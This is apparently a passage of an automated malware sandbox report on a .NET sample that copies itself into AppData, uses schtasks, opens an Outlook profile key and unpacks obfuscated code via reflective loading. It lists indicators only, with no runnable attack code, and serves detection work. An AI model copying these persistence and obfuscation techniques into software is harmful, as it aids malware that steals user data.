Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll

Source: C:\Users\user\Desktop\PvAmrCZENy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\PvAmrCZENy.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\PvAmrCZENy.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PvAmrCZENy.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PvAmrCZENy.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: PvAmrCZENy.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: nqHL.pdb source: PvAmrCZENy.exe, yxXYABHh.exe.0.dr
Source:	Binary string: nqHL.pdbSHA256T source: PvAmrCZENy.exe, yxXYABHh.exe.0.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: PvAmrCZENy.exe, Form3.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: yxXYABHh.exe.0.dr, Form3.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	.Net Code: csRqMlZYOA System.Reflection.Assembly.Load(byte[])
Source: 0.2.PvAmrCZENy.exe.75c0000.6.raw.unpack, MainForm.cs	.Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.PvAmrCZENy.exe.421b370.5.raw.unpack, MainForm.cs	.Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	.Net Code: csRqMlZYOA System.Reflection.Assembly.Load(byte[])
Source: 0.2.PvAmrCZENy.exe.423b390.3.raw.unpack, MainForm.cs	.Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.PvAmrCZENy.exe.4c855c0.1.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	.Net Code: csRqMlZYOA System.Reflection.Assembly.Load(byte[])

Source: PvAmrCZENy.exe

Static PE information: 0xB587A68D [Mon Jul 5 14:34:53 2066 UTC]

Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 0_2_02FFEF88 push eax; iretd	0_2_02FFEF89
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_0244891E pushad ; iretd	7_2_0244891F
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_02448C2F pushfd ; iretd	7_2_02448C30
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_02448DDF push esp; iretd	7_2_02448DE0
Source: C:\Users\user\Desktop\PvAmrCZENy.exe	Code function: 7_2_06402DBE pushfd ; retf	7_2_06402DC1
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_00B9EF88 push eax; iretd	8_2_00B9EF89
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06A0C308 push esp; retf	8_2_06A0C309
Source: C:\Users\user\AppData\Roaming\yxXYABHh.exe	Code function: 8_2_06A0C342 push 84026ACBh; retf	8_2_06A0C349

Source: PvAmrCZENy.exe	Static PE information: section name: .text entropy: 7.743655537564809
Source: yxXYABHh.exe.0.dr	Static PE information: section name: .text entropy: 7.743655537564809

Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, mS6gZkYdVOZrKGG8hX.cs	High entropy of concatenated method names: 'J7AaBq5AmW', 'Q23acaNdj4', 'rYRa64TZ1g', 'vOLa41x1MQ', 'f51a252qY4', 'rrpaKApV4F', 'JwraPJx0dK', 'uLSa55YIvQ', 'O1ZaQh8Spu', 'crpaf19yCs'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, u07XDpgHpxVYHUppXV.cs	High entropy of concatenated method names: 'kHc3lQmyVa', 'dB63nZmol5', 'z413VFn9Dt', 'Xx33gD07FC', 'i203HsBgeA', 'TJ43bOSgTH', 'UaY3RkSaZR', 'ePx3tyKF3h', 'Jsf3ay0Ydt', 'E0N3jsBiZw'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, JpsTIeV6A7NfgyrDkl.cs	High entropy of concatenated method names: 'yi0xIMAFtt', 'uXhxSVs1Wf', 'd5HxWcy9VZ', 'na4xd6726b', 'yjmxmZ9Idw', 't0Tx9iWqVK', 'XCExDFEmj2', 'DToxTnSAZq', 'HVExY6aFDK', 'np3x88dtgq'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, F6ARVpzaNnUQdyao3j.cs	High entropy of concatenated method names: 'YBTjntpLlo', 'V7wjVmXXrR', 'HiLjg7UDxI', 'rH3jBgFOhe', 'H3fjcYhEsK', 'YGTj4APm3d', 'MCxj2W3V9Z', 'khJjo0esdV', 'CK4jEgFsP1', 's2xjGvBeqv'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	High entropy of concatenated method names: 'hDJNUEHoo9', 'mXZNZWmFmn', 'PZhNx6iguh', 'lHiN3FYVm9', 'CQlNJKnFK9', 'Ga6N1xn8FL', 'BpSNAgnXth', 'RMxNhATRlq', 'xAlNwIukUO', 'gLONFSnbeD'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, kPeThipR6kgr26coax.cs	High entropy of concatenated method names: 'abxCViXfl6', 'OU9CgfWPqo', 'XInCB2dqKc', 'vmSCcKhNYa', 'T3NC4CFstu', 'irpC2DmQDS', 'J8eCPDvBaD', 'GPyC5W63TT', 'XZBCf6mEgD', 'VlqCugba9s'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, dpeYSjP1UMv2qXuK2B.cs	High entropy of concatenated method names: 'dsDAZ6kYw4', 'B6tA3v8m86', 'TXrA1IqkEQ', 'cQ218PnGSy', 'VgP1zIWbxK', 'MYbAyAOmFK', 'hZpArtyArd', 'mqMAeiPlLs', 'CUgANnPmdT', 'cirAqpJbbu'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, q5clipqBHqOnkVSmJl.cs	High entropy of concatenated method names: 'Lg2rApsTIe', 'HA7rhNfgyr', 'QHprFxVYHU', 'QpXr0VhpXV', 'h2grHREBSP', 'I4nrb6VM63', 'EhwZ7jm1RaItdGKwV4', 'OhGUIvPrI70fhZoKhO', 'K0VrrEMBZ4', 'DrWrNWXgI6'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, oXOgna9aQgAHxFpovw.cs	High entropy of concatenated method names: 'sCIRTU8oPy', 'vTCR8FNjAc', 'bVCtyDEGQq', 'IkRtrisgky', 'lppRuqNxqC', 'RUDRkK2cYo', 'VHSRprZkeV', 'UbsRIOm0Pn', 'zbERSwwe05', 'BvpRWCtFIZ'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, gUKDmLQMndPSRA3HBN.cs	High entropy of concatenated method names: 'E5GAEuKKof', 'DaTAG3Tqir', 'KETAM1BfAg', 'bVPAl0wNIn', 'RTDAXt4YeQ', 'CvKAnk2oCD', 'Cj5AimgKG0', 'MkrAVDUoFZ', 'MMiAgsyum4', 'LdKAvKgkF7'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, fNvmGLe0G2dhMMIpXW.cs	High entropy of concatenated method names: 'G9rMlBW2E', 'iGlltvWyi', 'sIGnFNdJQ', 'yIai4Ips9', 'Uh8gDDXqg', 'lLQvr9jDn', 'mVdqPLMcyw7HRWxGdv', 'kHVPf0RLuquZ21kiVD', 'SltoTaD97evxTboRMv', 'sGmttreK4'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, IabwK0xQXmYgZNDWfQ.cs	High entropy of concatenated method names: 'Dispose', 'ucarY9FiTe', 'DCoecf9Hyk', 'zcJESGHMNm', 'rD2r849Pkk', 'OtZrz6LtDO', 'ProcessDialogKey', 'UFFeyS6gZk', 'TVOerZrKGG', 'YhXeek1YV7'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, PTqIT3WJvtWp0iNXPt.cs	High entropy of concatenated method names: 'ToString', 'M33buN4nyo', 'ocmbcP1QRr', 'tlxb6NoSfq', 'UJUb4vITuF', 'tjXb26XYyg', 'KGLbKKSKaM', 'ocrbP3TKqf', 'QBhb5WkERo', 'FisbQqS9X6'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, x3lxZTDkOsca9FiTet.cs	High entropy of concatenated method names: 'e8caHRvfjc', 'h3haRka78F', 'zJJaaUHoCw', 'mr3aLP4XWp', 'Ua4aslXHH7', 'rYVaovyLYN', 'Dispose', 'bEYtZ57hlF', 'Rahtx8FWg1', 'MCyt3VJxaO'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, P1YV7U870rVYc4tCci.cs	High entropy of concatenated method names: 'zFij3dUluH', 'GmVjJRTjSu', 'W74j1J5qIN', 'VjUjA3LMsj', 't1Fja10DH9', 'xXTjh425mc', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, oCTbc7rrOLM3ykXKQk9.cs	High entropy of concatenated method names: 'nhKj82JbQ3', 'Bh3jzH6qUa', 'LEcLySmmlH', 'XDRLrin47M', 'nuALeZya4u', 'aMYLNuM0w4', 'KWrLqRwyt8', 'sYqLU9sgWK', 'CEMLZ3UUCI', 'wbELxssCkb'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, strlKMIZoyKBubENRm.cs	High entropy of concatenated method names: 'me6HfY8w0q', 'BVsHkR5PDN', 'N9uHIjf3re', 'UyfHS4dEos', 'ufVHc9pegC', 'woIH6nlYe1', 'kO5H4FRx7V', 'a7mH2tA4Th', 'W9lHKxUhii', 'tNeHP0PnLX'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, GSP44nB6VM63cs9A1M.cs	High entropy of concatenated method names: 'QHa1UQJaCO', 'Pvq1xx3Q9J', 'DSZ1JET7Hv', 'RVo1AZl3jx', 'fIe1hfs4kJ', 'EcyJmuG02C', 'znnJ9u0bli', 'HDLJD9Z9NS', 'y63JTN8yBF', 'uNUJYyGwgY'
Source: 0.2.PvAmrCZENy.exe.3120000.0.raw.unpack, kpXV5BvNYnN2J32gRE.cs	High entropy of concatenated method names: 'JVsJXhJ6iN', 'sjXJige1oP', 'VEy36BAyCC', 'jhY34i4E2W', 'QCa32Bdysb', 'irZ3Kj2HWs', 'O063PXPYcw', 'iED35xigtc', 'CAw3QHe4eV', 'u6Q3fCp0Po'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, mS6gZkYdVOZrKGG8hX.cs	High entropy of concatenated method names: 'J7AaBq5AmW', 'Q23acaNdj4', 'rYRa64TZ1g', 'vOLa41x1MQ', 'f51a252qY4', 'rrpaKApV4F', 'JwraPJx0dK', 'uLSa55YIvQ', 'O1ZaQh8Spu', 'crpaf19yCs'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, u07XDpgHpxVYHUppXV.cs	High entropy of concatenated method names: 'kHc3lQmyVa', 'dB63nZmol5', 'z413VFn9Dt', 'Xx33gD07FC', 'i203HsBgeA', 'TJ43bOSgTH', 'UaY3RkSaZR', 'ePx3tyKF3h', 'Jsf3ay0Ydt', 'E0N3jsBiZw'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, JpsTIeV6A7NfgyrDkl.cs	High entropy of concatenated method names: 'yi0xIMAFtt', 'uXhxSVs1Wf', 'd5HxWcy9VZ', 'na4xd6726b', 'yjmxmZ9Idw', 't0Tx9iWqVK', 'XCExDFEmj2', 'DToxTnSAZq', 'HVExY6aFDK', 'np3x88dtgq'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, F6ARVpzaNnUQdyao3j.cs	High entropy of concatenated method names: 'YBTjntpLlo', 'V7wjVmXXrR', 'HiLjg7UDxI', 'rH3jBgFOhe', 'H3fjcYhEsK', 'YGTj4APm3d', 'MCxj2W3V9Z', 'khJjo0esdV', 'CK4jEgFsP1', 's2xjGvBeqv'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, z8AZ6ghdOTIOtxwqZj.cs	High entropy of concatenated method names: 'hDJNUEHoo9', 'mXZNZWmFmn', 'PZhNx6iguh', 'lHiN3FYVm9', 'CQlNJKnFK9', 'Ga6N1xn8FL', 'BpSNAgnXth', 'RMxNhATRlq', 'xAlNwIukUO', 'gLONFSnbeD'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, kPeThipR6kgr26coax.cs	High entropy of concatenated method names: 'abxCViXfl6', 'OU9CgfWPqo', 'XInCB2dqKc', 'vmSCcKhNYa', 'T3NC4CFstu', 'irpC2DmQDS', 'J8eCPDvBaD', 'GPyC5W63TT', 'XZBCf6mEgD', 'VlqCugba9s'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, dpeYSjP1UMv2qXuK2B.cs	High entropy of concatenated method names: 'dsDAZ6kYw4', 'B6tA3v8m86', 'TXrA1IqkEQ', 'cQ218PnGSy', 'VgP1zIWbxK', 'MYbAyAOmFK', 'hZpArtyArd', 'mqMAeiPlLs', 'CUgANnPmdT', 'cirAqpJbbu'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, q5clipqBHqOnkVSmJl.cs	High entropy of concatenated method names: 'Lg2rApsTIe', 'HA7rhNfgyr', 'QHprFxVYHU', 'QpXr0VhpXV', 'h2grHREBSP', 'I4nrb6VM63', 'EhwZ7jm1RaItdGKwV4', 'OhGUIvPrI70fhZoKhO', 'K0VrrEMBZ4', 'DrWrNWXgI6'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, oXOgna9aQgAHxFpovw.cs	High entropy of concatenated method names: 'sCIRTU8oPy', 'vTCR8FNjAc', 'bVCtyDEGQq', 'IkRtrisgky', 'lppRuqNxqC', 'RUDRkK2cYo', 'VHSRprZkeV', 'UbsRIOm0Pn', 'zbERSwwe05', 'BvpRWCtFIZ'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, gUKDmLQMndPSRA3HBN.cs	High entropy of concatenated method names: 'E5GAEuKKof', 'DaTAG3Tqir', 'KETAM1BfAg', 'bVPAl0wNIn', 'RTDAXt4YeQ', 'CvKAnk2oCD', 'Cj5AimgKG0', 'MkrAVDUoFZ', 'MMiAgsyum4', 'LdKAvKgkF7'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, fNvmGLe0G2dhMMIpXW.cs	High entropy of concatenated method names: 'G9rMlBW2E', 'iGlltvWyi', 'sIGnFNdJQ', 'yIai4Ips9', 'Uh8gDDXqg', 'lLQvr9jDn', 'mVdqPLMcyw7HRWxGdv', 'kHVPf0RLuquZ21kiVD', 'SltoTaD97evxTboRMv', 'sGmttreK4'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, IabwK0xQXmYgZNDWfQ.cs	High entropy of concatenated method names: 'Dispose', 'ucarY9FiTe', 'DCoecf9Hyk', 'zcJESGHMNm', 'rD2r849Pkk', 'OtZrz6LtDO', 'ProcessDialogKey', 'UFFeyS6gZk', 'TVOerZrKGG', 'YhXeek1YV7'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, PTqIT3WJvtWp0iNXPt.cs	High entropy of concatenated method names: 'ToString', 'M33buN4nyo', 'ocmbcP1QRr', 'tlxb6NoSfq', 'UJUb4vITuF', 'tjXb26XYyg', 'KGLbKKSKaM', 'ocrbP3TKqf', 'QBhb5WkERo', 'FisbQqS9X6'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, x3lxZTDkOsca9FiTet.cs	High entropy of concatenated method names: 'e8caHRvfjc', 'h3haRka78F', 'zJJaaUHoCw', 'mr3aLP4XWp', 'Ua4aslXHH7', 'rYVaovyLYN', 'Dispose', 'bEYtZ57hlF', 'Rahtx8FWg1', 'MCyt3VJxaO'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, P1YV7U870rVYc4tCci.cs	High entropy of concatenated method names: 'zFij3dUluH', 'GmVjJRTjSu', 'W74j1J5qIN', 'VjUjA3LMsj', 't1Fja10DH9', 'xXTjh425mc', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, oCTbc7rrOLM3ykXKQk9.cs	High entropy of concatenated method names: 'nhKj82JbQ3', 'Bh3jzH6qUa', 'LEcLySmmlH', 'XDRLrin47M', 'nuALeZya4u', 'aMYLNuM0w4', 'KWrLqRwyt8', 'sYqLU9sgWK', 'CEMLZ3UUCI', 'wbELxssCkb'
Source: 0.2.PvAmrCZENy.exe.4d0c9e0.4.raw.unpack, strlKMIZoyKBubENRm.cs	High entropy of concatenated method names: 'me6HfY8w0q', 'BVsHkR5PDN', 'N9uHIjf3re', 'UyfHS4dEos', 'ufVHc9pegC', 'woIH6nlYe1', 'kO5H4FRx7V', 'a7mH2tA4Th', 'W9lHKxUhii', 'tNeHP0PnLX'
